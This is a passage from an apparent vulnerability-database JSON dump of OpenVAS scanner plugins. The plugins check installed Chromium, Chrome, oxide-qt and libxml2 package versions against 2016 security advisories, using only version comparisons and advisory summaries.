URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:13", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706 \nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708 \nAdam Varsan discovered a 
use-after-free issue.\n\nCVE-2016-1709 \nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710 \nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711 \nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127 \ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128 \nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129 \nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130 \nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131 \nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132 \nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133 \nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134 \nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135 \nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136 \nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137 \nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3637-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703637", "href": "http://plugins.openvas.org/nasl.php?oid=703637", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3637.nasl 3798 2016-08-04 11:01:10Z antu123 $\n# Auto-generated from advisory DSA 3637-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# 
Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703637);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\",\n \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_name(\"Debian Security Advisory DSA 3637-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:39 +0530 (Thu, 04 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", 
value: \"http://www.debian.org/security/2016/dsa-3637.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706 \nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708 \nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709 \nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710 \nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711 \nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127 \ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128 \nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129 \nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130 \nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131 \nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132 \nBen 
Kelly discovered a same-origin bypass.\n\nCVE-2016-5133 \nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134 \nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135 \nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136 \nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137 \nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2019-05-29T18:35:19", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130\nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3637-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", 
"CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703637", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3637.nasl 3798 2016-08-04 11:01:10Z antu123 $\n# Auto-generated from advisory DSA 3637-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703637\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\",\n \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_name(\"Debian Security Advisory DSA 3637-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:39 +0530 (Thu, 04 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3637.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable 
(sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130\nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:40", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-3041-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1706", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# Ubuntu Update for oxide-qt USN-3041-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842848\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-06 05:37:10 +0200 (Sat, 06 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n\t\t\"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \t\t\"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \t\t\"CVE-2016-5135\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-3041-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered\n in Chromium. If a user were tricked in to opening a specially crafted website,\n an attacker could potentially exploit these to read uninitialized memory,\n cause a denial of service (application crash) or execute arbitrary code.\n (CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the\norigin of IPC messages to the plugin broker process. A remote attacker\ncould potentially exploit this to bypass sandbox protection mechanisms.\n(CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a\ndeferred frame. A remote attacker could potentially exploit this to bypass\nsame origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a\ndetach operation on a DocumentLoader object. A remote attacker could\npotentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors\nfrom modifying a store target without setting a property. A remote\nattacker could potentially exploit this to bypass same origin\nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could\npotentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. 
If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement\nthe Secure Contexts specification during decisions about whether to\ncontrol a subframe. A remote attacker could potentially exploit this to\nbypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy\nauthentication. A man-in-the-middle attacker could potentially exploit this\nto spoof a proxy authentication login prompt. (CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium\ndoes ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3041-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3041-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.16.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.16.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.16.5-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.16.5-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:49", "description": "Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3744-1 (libxml2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703744", "href": "http://plugins.openvas.org/nasl.php?oid=703744", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3744.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3744-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703744);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_name(\"Debian Security Advisory DSA 3744-1 (libxml2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-23 00:00:00 +0100 (Fri, 23 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3744.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libxml2 on Debian Linux\");\n script_tag(name: \"insight\", value: \"XML is a metalanguage to let you\ndesign your own markup language. 
A regular markup language defines a way to\ndescribe information in a certain class of documents (eg HTML). XML lets you\ndefine your own customized markup languages for many classes of document. It\ncan do this because it's written in SGML, the international standard\nmetalanguage for markup languages.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += 